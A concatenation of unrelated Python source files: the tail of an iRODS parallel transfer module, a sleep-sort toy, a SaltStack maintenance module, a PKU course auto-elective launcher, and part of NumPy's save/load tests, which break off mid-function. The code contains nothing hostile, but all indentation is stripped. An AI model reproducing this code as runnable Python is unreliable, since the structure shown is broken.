futures.append(executor.submit( _io_part, Io, r, File, Operation, mgr, str(counter), queueObject))
counter += 1
Io = File = None
if Operation.isNonBlocking():
if _queueLength:
return futures, queueObject, mgr
else:
return futures
else:
bytecounts = [ f.result() for f in futures ]
return sum(bytecounts), total_size
# _io_main
# * Entry point for parallel transfers (multithreaded PUT and GET operations)
# * determine replica information
# * call multithread manager
def io_main( session, Data, opr_, fname, R='', **kwopt):
Operation = Oper(opr_)
d_path = None
Io = None
if isinstance(Data,tuple):
(Data, Io) = Data[:2]
if isinstance (Data, six.string_types):
d_path = Data
try:
Data = session.data_objects.get( Data )
d_path = Data.path
except DataObjectDoesNotExist:
if Operation.isGet(): raise
R_via_libcall = kwopt.pop( 'target_resource_name', '')
if R_via_libcall:
R = R_via_libcall
resc_options = {}
if Operation.isPut():
if R:
resc_options [kw.RESC_NAME_KW] = R
resc_options [kw.DEST_RESC_NAME_KW] = R
if (not Io):
(Io, rawfile) = session.data_objects.open_with_FileRaw( (d_path or Data.path),
Operation.data_object_mode(initial_open = True),
finalize_on_close = True, **resc_options )
else:
rawfile = Io.raw
# data object should now exist
if not isinstance(Data,iRODSDataObject):
Data = session.data_objects.get(d_path)
if Operation.isGet():
total_bytes = Io.seek(0,os.SEEK_END)
Io.seek(0,os.SEEK_SET)
else:
with open(fname, 'rb') as f:
f.seek(0,os.SEEK_END)
total_bytes = f.tell()
(replica_token , resc_hier) = rawfile.replica_access_info()
num_threads = kwopt.pop( 'num_threads', None)
if num_threads is None: num_threads = int(kwopt.get('N','0'))
queueLength = kwopt.get('queueLength',0)
retval = _io_multipart_threaded (Operation, (Data, Io), replica_token, resc_hier, session, fname, total_bytes,
num_threads = num_threads,
_queueLength = queueLength)
# SessionObject.data_objects.parallel_{put,get} will return:
# - immediately with an AsyncNotify instance, if Oper.NONBLOCKING flag is used.
# - upon completion with a boolean completion status, otherwise.
if Operation.isNonBlocking():
if queueLength > 0:
(futures, chunk_notify_queue, mgr) = retval
else:
futures = retval
chunk_notify_queue = total_bytes = None
return AsyncNotify( futures, # individual futures, one per transfer thread
progress_Queue = chunk_notify_queue, # for notifying the progress indicator thread
total = total_bytes, # total number of bytes for parallel transfer
keep_ = {'mgr': mgr} ) # an open raw i/o object needing to be persisted, if any
else:
(_bytes_transferred, _bytes_total) = retval
return (_bytes_transferred == _bytes_total)
if __name__ == '__main__':
import getopt
import atexit
from irods.session import iRODSSession
def setupLoggingWithDateTimeHeader(name,level = logging.DEBUG):
if _nullh in logger.handlers:
logger.removeHandler(_nullh)
if name:
handler = logging.FileHandler(name)
else:
handler = logging.StreamHandler()
handler.setFormatter(logging.Formatter('%(asctime)-15s - %(message)s'))
logger.addHandler(handler)
logger.setLevel( level )
try:
env_file = os.environ['IRODS_ENVIRONMENT_FILE']
except KeyError:
env_file = os.path.expanduser('~/.irods/irods_environment.json')
ssl_context = ssl.create_default_context(purpose=ssl.Purpose.SERVER_AUTH, cafile=None, capath=None, cadata=None)
ssl_settings = {'ssl_context': ssl_context}
sess = iRODSSession(irods_env_file=env_file, **ssl_settings)
atexit.register(lambda : sess.cleanup())
opt,arg = getopt.getopt( sys.argv[1:], 'vL:l:aR:N:')
opts = dict(opt)
logFilename = opts.pop('-L',None) # '' for console, non-empty for filesystem destination
logLevel = (logging.INFO if logFilename is None else logging.DEBUG)
logFilename = logFilename or opts.pop('-l',None)
if logFilename is not None:
setupLoggingWithDateTimeHeader(logFilename, logLevel)
verboseConnection = (opts.pop('-v',None) is not None)
async_xfer = opts.pop('-a',None)
kwarg = { k.lstrip('-'):v for k,v in opts.items() }
arg[1] = Oper.PUT if arg[1].lower() in ('w','put','a') \
else Oper.GET
if async_xfer is not None:
arg[1] |= Oper.NONBLOCKING
ret = io_main(sess, *arg, **kwarg) # arg[0] = data object or path
# arg[1] = operation: or'd flags : [PUT|GET] NONBLOCKING
# arg[2] = file path on local filesystem
# kwarg['queueLength'] sets progress-queue length (0 if no progress indication needed)
# kwarg options 'N' (num threads) and 'R' (target resource name) are via command-line
# kwarg['num_threads'] (overrides 'N' when called as a library)
# kwarg['target_resource_name'] (overrides 'R' when called as a library)
if isinstance( ret, AsyncNotify ):
print('waiting on completion...',file=sys.stderr)
ret.set_transfer_done_callback(lambda r: print('Async transfer done for:',r,file=sys.stderr))
done = ret.wait_until_transfer_done (timeout=10.0) # - or do other useful work here
if done:
bytes_transferred = sum(ret.futures_done.values())
print ('Asynch transfer complete. Total bytes transferred:', bytes_transferred,file=sys.stderr)
else:
print ('Asynch transfer was not completed before timeout expired.',file=sys.stderr)
else:
print('Synchronous transfer {}'.format('succeeded' if ret else 'failed'),file=sys.stderr)
# Note : This module requires concurrent.futures, included in Python3.x.
# On Python2.7, this dependency must be installed using 'pip install futures'.
# Demonstration :
#
# $ dd if=/dev/urandom bs=1k count=150000 of=$HOME/puttest
# $ time python -m irods.parallel -R demoResc -N 3 `ipwd`/test.dat put $HOME/puttest # add -v,-a for verbose, asynch
# $ time python -m irods.parallel -R demoResc -N 3 `ipwd`/test.dat get $HOME/gettest # add -v,-a for verbose, asynch
# $ diff puttest gettest
|
sleep-sort.py
|
import threading
import sys
from time import sleep
sort_list = []
def validate_list():
for num in sys.argv:
try:
sort_list.append(int(num))
except ValueError:
pass
def sleep_sort(n):
sleep(n)
print(n, end=", ")
def main():
validate_list()
for num in sort_list:
threading.Thread(target=sleep_sort, args=(num, )).start()
main()
|
maint.py
|
# -*- coding: utf-8 -*-
'''
Define the behaviors used in the maintinance process
'''
# Import python libs
import multiprocessing
import os
# Import ioflo libs
import ioflo.base.deeding
# Import salt libs
import salt.fileserver
import salt.loader
import salt.utils.minions
import salt.daemons.masterapi
class SaltRaetMaintFork(ioflo.base.deeding.Deed):
'''
For off the maintinence process from the master router process
FloScript:
do salt raet maint fork at enter
'''
Ioinits = {'opts': '.salt.opts'}
def _fork_maint(self):
'''
Run the multiprocessing in here to fork the maintinace process
'''
proc = multiprocessing.Process(target=self._maint)
proc.start()
def _maint(self):
'''
Spin up a worker, do this in s multiprocess
'''
behaviors = ['salt.daemons.flo']
preloads = [('.salt.opts', dict(value=self.opts.value))]
console_logdir = self.opts.value.get('ioflo_console_logdir', '')
if console_logdir:
consolepath = os.path.join(console_logdir, 'maintenance.log')
else: # empty means log to std out
consolepath = ''
ioflo.app.run.start(
name='maintenance',
period=float(self.opts.value['loop_interval']),
stamp=0.0,
real=self.opts.value['ioflo_realtime'],
filepath=self.opts.value['maintenance_floscript'],
behaviors=behaviors,
username="",
password="",
mode=None,
houses=None,
metas=None,
preloads=preloads,
verbose=int(self.opts.value['ioflo_verbose']),
consolepath=consolepath,
)
def action(self):
'''
make go!
'''
self._fork_maint()
class SaltRaetMaintSetup(ioflo.base.deeding.Deed):
'''
Init loader objects used
FloScript:
do salt raet maint setup at enter
'''
Ioinits = {'opts': '.salt.opts',
'fileserver': '.salt.loader.fileserver',
'runners': '.salt.loader.runners',
'pillargitfs': '.salt.loader.pillargitfs',
'ckminions': '.salt.loader.ckminions'}
def action(self):
'''
Set up the objects used in the maint process
'''
self.fileserver.value = salt.fileserver.Fileserver(self.opts.value)
self.runners.value = salt.loader.runner(self.opts.value)
self.ckminions.value = salt.utils.minions.CkMinions(self.opts.value)
self.pillargitfs.value = salt.daemons.masterapi.init_git_pillar(
self.opts.value)
class SaltRaetMainFileserverClean(ioflo.base.deeding.Deed):
'''
Clear the fileserver backend caches
FloScript:
do salt raet maint fileserver clean at enter
'''
Ioinits = {'opts': '.salt.opts'}
def action(self):
'''
Clean!
'''
salt.daemons.masterapi.clean_fsbackend(self.opts.value)
class SaltRaetMainOldJobsClear(ioflo.base.deeding.Deed):
'''
Iterate over the jobs directory and clean out the old jobs
FloScript:
do salt raet maint old jobs clear
'''
Ioinits = {'opts': '.salt.opts'}
def action(self):
'''
Clear out the old jobs cache
'''
salt.daemons.masterapi.clean_old_jobs(self.opts.value)
class SaltRaetMainBackendsUpdate(ioflo.base.deeding.Deed):
'''
Update the fileserver and external pillar caches
FloScript:
do salt raet maint backends update
'''
Ioinits = {'opts': '.salt.opts',
'fileserver': '.salt.loader.fileserver',
'pillargitfs': '.salt.loader.pillargitfs'}
def action(self):
'''
Update!
'''
for pillargit in self.pillargitfs.value:
pillargit.update()
salt.daemons.masterapi.fileserver_update(self.fileserver.value)
|
main.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# filename: main.py
# modified: 2019-09-11
import os
import time
from optparse import OptionParser
from multiprocessing import Process, Manager, Queue
from autoelective import __version__, __date__
def task_run_loop():
from autoelective.loop import main as run_main_loop
from autoelective.logger import ConsoleLogger
from autoelective.const import SIGNAL_KILL_ALL_PROCESSES
cout = ConsoleLogger("main")
signals = Queue()
p = Process(target=run_main_loop, name="Main", args=(signals,))
p.daemon = True
p.start()
while True:
try:
signal = signals.get() # block process
except KeyboardInterrupt as e:
cout.info("Process %s is killed" % os.getpid())
return
time.sleep(0.1) # wait a minute
if signal == SIGNAL_KILL_ALL_PROCESSES:
if p.is_alive():
p.terminate()
cout.info("Process %s is killed" % p.name)
break
def task_run_loop_with_monitor():
from autoelective.parser import load_course_csv
from autoelective.loop import main as run_main_loop
from autoelective.monitor import main as run_monitor
from autoelective.logger import ConsoleLogger
from autoelective.const import SIGNAL_KILL_ALL_PROCESSES
cout = ConsoleLogger("main")
signals = Queue()
with Manager() as manager:
# shared objects
goals = manager.list(load_course_csv())
ignored = manager.list()
status = manager.dict()
status["main_loop"] = 0
status["login_loop"] = 0
status["error_count"] = 0
status["errors"] = manager.dict()
pList = [
Process(target=run_main_loop, name="Main", args=(signals, goals, ignored, status)),
Process(target=run_monitor, name="Monitor", args=(signals, goals, ignored, status)),
]
for p in pList:
p.daemon = True
p.start()
while True:
try:
signal = signals.get() # block process
except KeyboardInterrupt as e:
cout.info("Process %s is killed" % os.getpid())
return
time.sleep(0.1) # wait a minute
if signal == SIGNAL_KILL_ALL_PROCESSES:
for p in pList:
if p.is_alive():
p.terminate()
cout.info("Process %s is killed" % p.name)
break
def main():
parser = OptionParser(
description='PKU Auto-Elective Tool v%s (%s)' % (__version__, __date__),
version=__version__,
)
# MARK: custom input files
parser.add_option(
'--config',
dest='CONFIG_INI',
metavar="FILE",
help='custom config file encoded with utf8',
)
parser.add_option(
'--course-csv-utf8',
dest='COURSE_UTF8_CSV',
metavar="FILE",
help='custom course.csv file encoded with utf8',
)
parser.add_option(
'--course-csv-gbk',
dest='COURSE_GBK_CSV',
metavar="FILE",
help='custom course.csv file encoded with gbk',
)
# MARK: boolean (flag) options
parser.add_option(
'--with-monitor',
dest='with_monitor',
action='store_true',
default=False,
help='run the monitor process simultaneously',
)
options, args = parser.parse_args()
run_task = task_run_loop
# MARK: setup custom const
import autoelective.const as const
if options.CONFIG_INI is not None:
const.CONFIG_INI = options.CONFIG_INI
if options.COURSE_UTF8_CSV is not None:
const.COURSE_UTF8_CSV = options.COURSE_UTF8_CSV
if options.COURSE_GBK_CSV is not None:
const.COURSE_GBK_CSV = options.COURSE_GBK_CSV
# MAKR: handle boolean (flag) options
if options.with_monitor:
run_task = task_run_loop_with_monitor
run_task()
if __name__ == '__main__':
main()
|
test_io.py
|
import sys
import gc
import gzip
import os
import threading
import time
import warnings
import io
import re
import pytest
from pathlib import Path
from tempfile import NamedTemporaryFile
from io import BytesIO, StringIO
from datetime import datetime
import locale
from multiprocessing import Process, Value
from ctypes import c_bool
import numpy as np
import numpy.ma as ma
from numpy.lib._iotools import ConverterError, ConversionWarning
from numpy.compat import asbytes
from numpy.ma.testutils import assert_equal
from numpy.testing import (
assert_warns, assert_, assert_raises_regex, assert_raises,
assert_allclose, assert_array_equal, temppath, tempdir, IS_PYPY,
HAS_REFCOUNT, suppress_warnings, assert_no_gc_cycles, assert_no_warnings,
break_cycles
)
from numpy.testing._private.utils import requires_memory
class TextIO(BytesIO):
"""Helper IO class.
Writes encode strings to bytes if needed, reads return bytes.
This makes it easier to emulate files opened in binary mode
without needing to explicitly convert strings to bytes in
setting up the test data.
"""
def __init__(self, s=""):
BytesIO.__init__(self, asbytes(s))
def write(self, s):
BytesIO.write(self, asbytes(s))
def writelines(self, lines):
BytesIO.writelines(self, [asbytes(s) for s in lines])
IS_64BIT = sys.maxsize > 2**32
try:
import bz2
HAS_BZ2 = True
except ImportError:
HAS_BZ2 = False
try:
import lzma
HAS_LZMA = True
except ImportError:
HAS_LZMA = False
def strptime(s, fmt=None):
"""
This function is available in the datetime module only from Python >=
2.5.
"""
if type(s) == bytes:
s = s.decode("latin1")
return datetime(*time.strptime(s, fmt)[:3])
class RoundtripTest:
def roundtrip(self, save_func, *args, **kwargs):
"""
save_func : callable
Function used to save arrays to file.
file_on_disk : bool
If true, store the file on disk, instead of in a
string buffer.
save_kwds : dict
Parameters passed to `save_func`.
load_kwds : dict
Parameters passed to `numpy.load`.
args : tuple of arrays
Arrays stored to file.
"""
save_kwds = kwargs.get('save_kwds', {})
load_kwds = kwargs.get('load_kwds', {"allow_pickle": True})
file_on_disk = kwargs.get('file_on_disk', False)
if file_on_disk:
target_file = NamedTemporaryFile(delete=False)
load_file = target_file.name
else:
target_file = BytesIO()
load_file = target_file
try:
arr = args
save_func(target_file, *arr, **save_kwds)
target_file.flush()
target_file.seek(0)
if sys.platform == 'win32' and not isinstance(target_file, BytesIO):
target_file.close()
arr_reloaded = np.load(load_file, **load_kwds)
self.arr = arr
self.arr_reloaded = arr_reloaded
finally:
if not isinstance(target_file, BytesIO):
target_file.close()
# holds an open file descriptor so it can't be deleted on win
if 'arr_reloaded' in locals():
if not isinstance(arr_reloaded, np.lib.npyio.NpzFile):
os.remove(target_file.name)
def check_roundtrips(self, a):
self.roundtrip(a)
self.roundtrip(a, file_on_disk=True)
self.roundtrip(np.asfortranarray(a))
self.roundtrip(np.asfortranarray(a), file_on_disk=True)
if a.shape[0] > 1:
# neither C nor Fortran contiguous for 2D arrays or more
self.roundtrip(np.asfortranarray(a)[1:])
self.roundtrip(np.asfortranarray(a)[1:], file_on_disk=True)
def test_array(self):
a = np.array([], float)
self.check_roundtrips(a)
a = np.array([[1, 2], [3, 4]], float)
self.check_roundtrips(a)
a = np.array([[1, 2], [3, 4]], int)
self.check_roundtrips(a)
a = np.array([[1 + 5j, 2 + 6j], [3 + 7j, 4 + 8j]], dtype=np.csingle)
self.check_roundtrips(a)
a = np.array([[1 + 5j, 2 + 6j], [3 + 7j, 4 + 8j]], dtype=np.cdouble)
self.check_roundtrips(a)
def test_array_object(self):
a = np.array([], object)
self.check_roundtrips(a)
a = np.array([[1, 2], [3, 4]], object)
self.check_roundtrips(a)
def test_1D(self):
a = np.array([1, 2, 3, 4], int)
self.roundtrip(a)
@pytest.mark.skipif(sys.platform == 'win32', reason="Fails on Win32")
def test_mmap(self):
a = np.array([[1, 2.5], [4, 7.3]])
self.roundtrip(a, file_on_disk=True, load_kwds={'mmap_mode': 'r'})
a = np.asfortranarray([[1, 2.5], [4, 7.3]])
self.roundtrip(a, file_on_disk=True, load_kwds={'mmap_mode': 'r'})
def test_record(self):
a = np.array([(1, 2), (3, 4)], dtype=[('x', 'i4'), ('y', 'i4')])
self.check_roundtrips(a)
@pytest.mark.slow
def test_format_2_0(self):
dt = [(("%d" % i) * 100, float) for i in range(500)]
a = np.ones(1000, dtype=dt)
with warnings.catch_warnings(record=True):
warnings.filterwarnings('always', '', UserWarning)
self.check_roundtrips(a)
class TestSaveLoad(RoundtripTest):
def roundtrip(self, *args, **kwargs):
RoundtripTest.roundtrip(self, np.save, *args, **kwargs)
assert_equal(self.arr[0], self.arr_reloaded)
assert_equal(self.arr[0].dtype, self.arr_reloaded.dtype)
assert_equal(self.arr[0].flags.fnc, self.arr_reloaded.flags.fnc)
class TestSavezLoad(RoundtripTest):
def roundtrip(self, *args, **kwargs):
RoundtripTest.roundtrip(self, np.savez, *args, **kwargs)
try:
for n, arr in enumerate(self.arr):
reloaded = self.arr_reloaded['arr_%d' % n]
assert_equal(arr, reloaded)
assert_equal(arr.dtype, reloaded.dtype)
assert_equal(arr.flags.fnc, reloaded.flags.fnc)
finally:
# delete tempfile, must be done here on windows
if self.arr_reloaded.fid:
self.arr_reloaded.fid.close()
os.remove(self.arr_reloaded.fid.name)
@pytest.mark.skipif(not IS_64BIT, reason="Needs 64bit platform")
@pytest.mark.slow
def test_big_arrays(self):
L = (1 << 31) + 100000
a = np.empty(L, dtype=np.uint8)
with temppath(prefix="numpy_test_big_arrays_", suffix=".npz") as tmp:
np.savez(tmp, a=a)
del a
npfile = np.load(tmp)
a = npfile['a'] # Should succeed
npfile.close()
del a # Avoid pyflakes unused variable warning.
def test_multiple_arrays(self):
a = np.array([[1, 2], [3, 4]], float)
b = np.array([[1 + 2j, 2 + 7j], [3 - 6j, 4 + 12j]], complex)
self.roundtrip(a, b)
def test_named_arrays(self):
a = np.array([[1, 2], [3, 4]], float)
b = np.array([[1 + 2j, 2 + 7j], [3 - 6j, 4 + 12j]], complex)
c = BytesIO()
np.savez(c, file_a=a, file_b=b)
c.seek(0)
l = np.load(c)
assert_equal(a, l['file_a'])
assert_equal(b, l['file_b'])
def test_BagObj(self):
a = np.array([[1, 2], [3, 4]], float)
b = np.array([[1 + 2j, 2 + 7j], [3 - 6j, 4 + 12j]], complex)
c = BytesIO()
np.savez(c, file_a=a, file_b=b)
c.seek(0)
l = np.load(c)
assert_equal(sorted(dir(l.f)), ['file_a','file_b'])
assert_equal(a, l.f.file_a)
assert_equal(b, l.f.file_b)
def test_savez_filename_clashes(self):
# Test that issue #852 is fixed
# and savez functions in multithreaded environment
def writer(error_list):
with temppath(suffix='.npz') as tmp:
arr = np.random.randn(500, 500)
try:
np.savez(tmp, arr=arr)
except OSError as err:
error_list.append(err)
errors = []
threads = [threading.Thread(target=writer, args=(errors,))
for j in range(3)]
for t in threads:
t.start()
for t in threads:
t.join()
if errors:
raise AssertionError(errors)
def test_not_closing_opened_fid(self):
# Test that issue #2178 is fixed:
# verify could seek on 'loaded' file
with temppath(suffix='.npz') as tmp:
with open(tmp, 'wb') as fp:
np.savez(fp, data='LOVELY LOAD')
with open(tmp, 'rb', 10000) as fp:
fp.seek(0)
assert_(not fp.closed)
np.load(fp)['data']
# fp must not get closed by .load
assert_(not fp.closed)
fp.seek(0)
assert_(not fp.closed)
@pytest.mark.slow_pypy
def test_closing_fid(self):
# Test that issue #1517 (too many opened files) remains closed
# It might be a "weak" test since failed to get triggered on
# e.g. Debian sid of 2012 Jul 05 but was reported to
# trigger the failure on Ubuntu 10.04:
# http://projects.scipy.org/numpy/ticket/1517#comment:2
with temppath(suffix='.npz') as tmp:
np.savez(tmp, data='LOVELY LOAD')
# We need to check if the garbage collector can properly close
# numpy npz file returned by np.load when their reference count
# goes to zero. Python 3 running in debug mode raises a
# ResourceWarning when file closing is left to the garbage
# collector, so we catch the warnings.
with suppress_warnings() as sup:
sup.filter(ResourceWarning) # TODO: specify exact message
for i in range(1, 1025):
try:
np.load(tmp)["data"]
except Exception as e:
msg = "Failed to load data from a file: %s" % e
raise AssertionError(msg)
finally:
if IS_PYPY:
gc.collect()
def test_closing_zipfile_after_load(self):
# Check that zipfile owns file and can close it. This needs to
# pass a file name to load for the test. On windows failure will
# cause a second error will be raised when the attempt to remove
# the open file is made.
prefix = 'numpy_test_closing_zipfile_after_load_'
with temppath(suffix='.npz', prefix=prefix) as tmp:
np.savez(tmp, lab='place holder')
data = np.load(tmp)
fp = data.zip.fp
data.close()
assert_(fp.closed)
class TestSaveTxt:
def test_array(self):
a = np.array([[1, 2], [3, 4]], float)
fmt = "%.18e"
c = BytesIO()
np.savetxt(c, a, fmt=fmt)
c.seek(0)
assert_equal(c.readlines(),
[asbytes((fmt + ' ' + fmt + '\n') % (1, 2)),
asbytes((fmt + ' ' + fmt + '\n') % (3, 4))])
a = np.array([[1, 2], [3, 4]], int)
c = BytesIO()
np.savetxt(c, a, fmt='%d')
c.seek(0)
assert_equal(c.readlines(), [b'1 2\n', b'3 4\n'])
def test_1D(self):
a = np.array([1, 2, 3, 4], int)
c = BytesIO()
np.savetxt(c, a, fmt='%d')
c.seek(0)
lines = c.readlines()
assert_equal(lines, [b'1\n', b'2\n', b'3\n', b'4\n'])
def test_0D_3D(self):
c = BytesIO()
assert_raises(ValueError, np.savetxt, c, np.array(1))
assert_raises(ValueError, np.savetxt, c, np.array([[[1], [2]]]))
def test_structured(self):
a = np.array([(1, 2), (3, 4)], dtype=[('x', 'i4'), ('y', 'i4')])
c = BytesIO()
np.savetxt(c, a, fmt='%d')
c.seek(0)
assert_equal(c.readlines(), [b'1 2\n', b'3 4\n'])
def test_structured_padded(self):
# gh-13297
a = np.array([(1, 2, 3),(4, 5, 6)], dtype=[
('foo', 'i4'), ('bar', 'i4'), ('baz', 'i4')
])
c = BytesIO()
np.savetxt(c, a[['foo', 'baz']], fmt='%d')
c.seek(0)
assert_equal(c.readlines(), [b'1 3\n', b'4 6\n'])
def test_multifield_view(self):
a = np.ones(1, dtype=[('x', 'i4'), ('y', 'i4'), ('z', 'f4')])
v = a[['x', 'z']]
with temppath(suffix='.npy') as path:
path = Path(path)
np.save(path, v)
data = np.load(path)
assert_array_equal(data, v)
def test_delimiter(self):
a = np.array([[1., 2.], [3., 4.]])
c = BytesIO()
np.savetxt(c, a, delimiter=',', fmt='%d')
c.seek(0)
assert_equal(c.readlines(), [b'1,2\n', b'3,4\n'])
def test_format(self):
a = np.array([(1, 2), (3, 4)])
c = BytesIO()
# Sequence of formats
np.savetxt(c, a, fmt=['%02d', '%3.1f'])
c.seek(0)
assert_equal(c.readlines(), [b'01 2.0\n', b'03 4.0\n'])
# A single multiformat string
c = BytesIO()
np.savetxt(c, a, fmt='%02d : %3.1f')
c.seek(0)
lines = c.readlines()
assert_equal(lines, [b'01 : 2.0\n', b'03 : 4.0\n'])
# Specify delimiter, should be overridden
c = BytesIO()
np.savetxt(c, a, fmt='%02d : %3.1f', delimiter=',')
c.seek(0)
lines = c.readlines()
assert_equal(lines, [b'01 : 2.0\n', b'03 : 4.0\n'])
# Bad fmt, should raise a ValueError
c = BytesIO()
assert_raises(ValueError, np.savetxt, c, a, fmt=99)
def test_header_footer(self):
# Test the functionality of the header and footer keyword argument.
c = BytesIO()
a = np.array([(1, 2), (3, 4)], dtype=int)
test_header_footer = 'Test header / footer'
# Test the header keyword argument
np.savetxt(c, a, fmt='%1d', header=test_header_footer)
c.seek(0)
assert_equal(c.read(),
asbytes('# ' + test_header_footer + '\n1 2\n3 4\n'))
# Test the footer keyword argument
c = BytesIO()
np.savetxt(c, a, fmt='%1d', footer=test_header_footer)
c.seek(0)
assert_equal(c.read(),
asbytes('1 2\n3 4\n# ' + test_header_footer + '\n'))
# Test the commentstr keyword argument used on the header
c = BytesIO()
commentstr = '% '
np.savetxt(c, a, fmt='%1d',
header=test_header_footer, comments=commentstr)
c.seek(0)
assert_equal(c.read(),
asbytes(commentstr + test_header_footer + '\n' + '1 2\n3 4\n'))
# Test the commentstr keyword argument used on the footer
c = BytesIO()
commentstr = '% '
np.savetxt(c, a, fmt='%1d',
footer=test_header_footer, comments=commentstr)
c.seek(0)
assert_equal(c.read(),
asbytes('1 2\n3 4\n' + commentstr + test_header_footer + '\n'))
def test_file_roundtrip(self):
with temppath() as name:
a = np.array([(1, 2), (3, 4)])
np.savetxt(name, a)
b = np.loadtxt(name)
assert_array_equal(a, b)
def test_complex_arrays(self):
ncols = 2
nrows = 2
a = np.zeros((ncols, nrows), dtype=np.complex128)
re = np.pi
im = np.e
a[:] = re + 1.0j * im
# One format only
c = BytesIO()
np.savetxt(c, a, fmt=' %+.3e')
c.seek(0)
lines = c.readlines()
assert_equal(
lines,
[b' ( +3.142e+00+ +2.718e+00j) ( +3.142e+00+ +2.718e+00j)\n',
b' ( +3.142e+00+ +2.718e+00j) ( +3.142e+00+ +2.718e+00j)\n'])
# One format for each real and imaginary part
c = BytesIO()
np.savetxt(c, a, fmt=' %+.3e' * 2 * ncols)
c.seek(0)
lines = c.readlines()
assert_equal(
lines,
[b' +3.142e+00 +2.718e+00 +3.142e+00 +2.718e+00\n',
b' +3.142e+00 +2.718e+00 +3.142e+00 +2.718e+00\n'])
# One format for each complex number
c = BytesIO()
np.savetxt(c, a, fmt=['(%.3e%+.3ej)'] * ncols)
c.seek(0)
lines = c.readlines()
assert_equal(
lines,
[b'(3.142e+00+2.718e+00j) (3.142e+00+2.718e+00j)\n',
b'(3.142e+00+2.718e+00j) (3.142e+00+2.718e+00j)\n'])
def test_complex_negative_exponent(self):
# Previous to 1.15, some formats generated x+-yj, gh 7895
ncols = 2
nrows = 2
a = np.zeros((ncols, nrows), dtype=np.complex128)
re = np.pi
im = np.e
a[:] = re - 1.0j * im
c = BytesIO()
np.savetxt(c, a, fmt='%.3e')
c.seek(0)
lines = c.readlines()
assert_equal(
lines,
[b' (3.142e+00-2.718e+00j) (3.142e+00-2.718e+00j)\n',
b' (3.142e+00-2.718e+00j) (3.142e+00-2.718e+00j)\n'])
def test_custom_writer(self):
class CustomWriter(list):
def write(self, text):
self.extend(text.split(b'\n'))
w = CustomWriter()
a = np.array([(1, 2), (3, 4)])
np.savetxt(w, a)
b = np.loadtxt(w)
assert_array_equal(a, b)
def test_unicode(self):
utf8 = b'\xcf\x96'.decode('UTF-8')
a = np.array([utf8], dtype=np.unicode_)
with tempdir() as tmpdir:
# set encoding as on windows it may not be unicode even on py3
np.savetxt(os.path.join(tmpdir, 'test.csv'), a, fmt=['%s'],
encoding='UTF-8')
def test_unicode_roundtrip(self):
utf8 = b'\xcf\x96'.decode('UTF-8')
a = np.array([utf8], dtype=np.unicode_)
# our gz wrapper support encoding
suffixes = ['', '.gz']
if HAS_BZ2:
suffixes.append('.bz2')
if HAS_LZMA:
suffixes.extend(['.xz', '.lzma'])
with tempdir() as tmpdir:
for suffix in suffixes:
np.savetxt(os.path.join(tmpdir, 'test.csv' + suffix), a,
fmt=['%s'], encoding='UTF-16-LE')
b = np.loadtxt(os.path.join(tmpdir, 'test.csv' + suffix),
encoding='UTF-16-LE', dtype=np.unicode_)
assert_array_equal(a, b)
def test_unicode_bytestream(self):
utf8 = b'\xcf\x96'.decode('UTF-8')
a = np.array([utf8], dtype=np.unicode_)
s = BytesIO()
np.savetxt(s, a, fmt=['%s'], encoding='UTF-8')
s.seek(0)
assert_equal(s.read().decode('UTF-8'), utf8 + '\n')
def test_unicode_stringstream(self):
utf8 = b'\xcf\x96'.decode('UTF-8')
a = np.array([utf8], dtype=np.unicode_)
s = StringIO()
np.savetxt(s, a, fmt=['%s'], encoding='UTF-8')
s.seek(0)
assert_equal(s.read(), utf8 + '\n')
@pytest.mark.parametrize("fmt", [u"%f", b"%f"])
@pytest.mark.parametrize("iotype", [StringIO, BytesIO])
def test_unicode_and_bytes_fmt(self, fmt, iotype):
# string type of fmt should not matter, see also gh-4053
a = np.array([1.])
s = iotype()
np.savetxt(s, a, fmt=fmt)
s.seek(0)
if iotype is StringIO:
assert_equal(s.read(), u"%f\n" % 1.)
else:
assert_equal(s.read(), b"%f\n" % 1.)
@pytest.mark.skipif(sys.platform=='win32', reason="files>4GB may not work")
@pytest.mark.slow
@requires_memory(free_bytes=7e9)
def test_large_zip(self):
def check_large_zip(memoryerror_raised):
memoryerror_raised.value = False
try:
# The test takes at least 6GB of memory, writes a file larger
# than 4GB. This tests the ``allowZip64`` kwarg to ``zipfile``
test_data = np.asarray([np.random.rand(
np.random.randint(50,100),4)
for i in range(800000)], dtype=object)
with tempdir() as tmpdir:
np.savez(os.path.join(tmpdir, 'test.npz'),
test_data=test_data)
except MemoryError:
memoryerror_raised.value = True
raise
# run in a subprocess to ensure memory is released on PyPy, see gh-15775
# Use an object in shared memory to re-raise the MemoryError exception
# in our process if needed, see gh-16889
memoryerror_raised = Value(c_bool)
p = Process(target=check_large_zip, args=(memoryerror_raised,))
p.start()
p.join()
if memoryerror_raised.value:
raise MemoryError("Child process raised a MemoryError exception")
# -9 indicates a SIGKILL, probably an OOM.
if p.exitcode == -9:
pytest.xfail("subprocess got a SIGKILL, apparently free memory was not sufficient")
assert p.exitcode == 0
class LoadTxtBase:
def check_compressed(self, fopen, suffixes):
# Test that we can load data from a compressed file
wanted = np.arange(6).reshape((2, 3))
linesep = ('\n', '\r\n', '\r')
for sep in linesep:
data = '0 1 2' + sep + '3 4 5'
for suffix in suffixes:
with temppath(suffix=suffix) as name:
with fopen(name, mode='wt', encoding='UTF-32-LE') as f:
f.write(data)
res = self.loadfunc(name, encoding='UTF-32-LE')
assert_array_equal(res, wanted)
with fopen(name, "rt", encoding='UTF-32-LE') as f:
res = self.loadfunc(f)
assert_array_equal(res, wanted)
def test_compressed_gzip(self):
self.check_compressed(gzip.open, ('.gz',))
@pytest.mark.skipif(not HAS_BZ2, reason="Needs bz2")
def test_compressed_bz2(self):
self.check_compressed(bz2.open, ('.bz2',))
@pytest.mark.skipif(not HAS_LZMA, reason="Needs lzma")
def test_compressed_lzma(self):
self.check_compressed(lzma.open, ('.xz', '.lzma'))
def test_encoding(self):
with temppath() as path:
with open(path, "wb") as f:
f.write('0.\n1.\n2.'.encode("UTF-16"))
x = self.loadfunc(path, encoding="UTF-16")
assert_array_equal(x, [0., 1., 2.])
def test_stringload(self):
# umlaute
nonascii = b'\xc3\xb6\xc3\xbc\xc3\xb6'.decode("UTF-8")
with temppath() as path:
with open(path, "wb") as f:
f.write(nonascii.encode("UTF-16"))
x = self.loadfunc(path, encoding="UTF-16", dtype=np.unicode_)
assert_array_equal(x, nonascii)
def test_binary_decode(self):
utf16 = b'\xff\xfeh\x04 \x00i\x04 \x00j\x04'
v = self.loadfunc(BytesIO(utf16), dtype=np.unicode_, encoding='UTF-16')
